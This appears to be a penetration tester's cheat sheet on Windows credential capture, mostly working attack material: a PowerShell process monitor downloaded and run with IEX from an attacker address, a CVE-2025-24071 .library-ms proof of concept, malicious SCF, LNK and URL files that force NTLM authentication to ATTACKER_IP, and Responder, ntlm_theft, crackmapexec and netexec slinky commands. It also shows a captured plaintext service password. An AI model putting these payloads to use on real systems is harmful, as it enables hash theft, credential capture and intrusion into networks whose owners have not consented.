Traffic Capture
Monitoring for Process Command Lines
procmon.ps1
Copy while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
Copy PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1')
InputObject SideIndicator
----------- -------------
@{CommandLine=C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}} =>
@{CommandLine=“C:\Windows\system32\cmd.exe” } =>
@{CommandLine=\??\C:\Windows\system32\conhost.exe 0x4} =>
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd} =>
@{CommandLine=“C:\Windows\system32\backgroundTaskHost.exe” -ServerName:CortanaUI.AppXy7vb4pc2... <= Vulnerable Services
Docker Desktop Community Edition before 2.1.0.1.
The program looks for docker-credential-wincred.exe and docker-credential-wincred.bat files in the C:\PROGRAMDATA\DockerDesktop\version-bin\. This directory was misconfigured to allow full write access to the BUILTIN\Users group, meaning that any authenticated user on the system could write a file into it (such as a malicious executable).
Any executable placed in that directory would run when a) the Docker application starts and b) when a user authenticates using the command docker login.
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
poc.library-ms
Copy <?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="<http://schemas.microsoft.com/windows/2009/library>">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\ATTACKER_IP\\SHARE_NAME</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription> SCF on a File Share
@Inventory.scf
Copy [Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
Copy sudo responder -wrf -v -I tun0 ntlm_theft
ntlm_theft supports the following attack types:
Browse to Folder Containing
.url – via ICONFILE field
.lnk - via icon_location field
.scf – via ICONFILE field (Not Working on Latest Windows)
autorun.inf via OPEN field (Not Working on Latest Windows)
desktop.ini - via IconResource field (Not Working on Latest Windows)
Open Document
.xml – via Microsoft Word external stylesheet
.xml – via Microsoft Word includepicture field
.htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
.docx – via Microsoft Word includepicture field
.docx – via Microsoft Word external template
.docx – via Microsoft Word frameset webSettings
.xlsx - via Microsoft Excel external cell
.wax - via Windows Media Player playlist (Better, primary open)
.asx – via Windows Media Player playlist (Better, primary open)
.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
.jnlp – via Java external jar
.application – via any Browser (Must be served via a browser downloaded or won’t run)
Open Document and Accept Popup
.pdf – via Adobe Acrobat Reader
Click Link in Chat Program
.txt – formatted link to paste into Zoom chat
CME
Copy crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP Rocabella
LNK File on a File Share
lnkdomb
Generating a Malicious .lnk File
Copy
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save() Netexec
Copy nxc smb IP -u username -p password -d domain.local -M slinky -o NAME=Shortcut SERVER=ATTACKER_IP Rocabella
URL Files on a File Share
This attack also works with .url files and responder -I eth0 -v
Copy [InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\10.10.10.10%USERNAME%.icon
IconIndex=1 Obfuscated Files
Word, ppt, scf, lnk, etc
